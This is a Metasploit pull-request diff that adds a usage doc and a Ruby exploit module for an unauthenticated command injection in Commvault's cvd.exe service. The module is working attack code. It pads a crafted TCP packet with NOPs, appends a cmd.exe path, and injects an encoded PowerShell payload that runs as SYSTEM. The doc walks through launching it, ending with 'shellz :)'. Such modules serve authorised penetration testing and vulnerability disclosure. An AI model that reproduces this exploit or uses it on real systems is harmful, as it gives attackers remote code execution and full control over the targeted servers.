Land rapid7#9340, Add exploit for Commvault Remote Command Injection

Land rapid7#9340

Author: wchen-r7

documentation/modules/exploit/windows/misc/commvault_cmd_exec.md

@@ -0,0 +1,21 @@
+## Vulnerable Application
+
+
+This module exploits a remote command injection vulnerability in the Commvault Communications service (cvd.exe). Exploitation of this vulnerability can allow for remote command execution as SYSTEM.
+
+
+Additional information can be found [here](https://www.securifera.com/advisories/sec-2017-0001/)
+
+
+
+## Verification Steps
+
+1. Start msfconsole
+
+2. `use exploit/windows/misc/commvault_cmd_exec`
+
+3. `set RHOST [ip]`
+
+4. `exploit`
+
+5. shellz :)

modules/exploits/windows/misc/commvault_cmd_exec.rb

@@ -0,0 +1,98 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Commvault Communications Service (cvd) Command Injection',
+      'Description'    => %q{
+        This module exploits a command injection vulnerability
+        discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
+        and v10). The vulnerability exists in the cvd.exe service and allows an
+        attacker to execute arbitrary commands in the context of the service. By
+        default, the Commvault Communications service installs and runs as SYSTEM in
+        Windows and does not require authentication. This vulnerability was discovered
+        in the Windows version. The Linux version wasn't tested.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
+            {
+              'Arch' => [ARCH_X64, ARCH_X86]
+            }
+          ],
+        ],
+      'Privileged'     => true,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Dec 12 2017'))
+
+      register_options([Opt::RPORT(8400)])
+
+    end
+
+  def exploit
+
+    buf = build_exploit
+    print_status("Connecting to Commvault Communications Service.")
+    connect
+    print_status("Executing payload")
+    #Send the payload
+    sock.put(buf)
+    #Handle the shell
+    handler
+    disconnect
+
+  end
+
+
+  def build_exploit
+
+    #Get encoded powershell of payload
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
+    #Remove additional cmd.exe call
+    psh = "powershell"
+    idx = command.index(psh)
+    command = command[(idx)..-1]
+
+    #Build packet
+    cmd_path = 'C:\Windows\System32\cmd.exe'
+    msg_type = 9
+    zero = 0
+    payload = ""
+    payload += make_nops(8)
+    payload += [msg_type].pack('I>')
+    payload += make_nops(328)
+    payload += cmd_path
+    payload += ";"
+    payload += ' /c "'
+    payload += command
+    payload += '" && echo '
+    payload += "\x00"
+    payload += [zero].pack('I>')
+
+    #Add length header and payload
+    ret_data = [payload.length].pack('I>')
+    ret_data += payload
+
+    ret_data
+
+  end
+end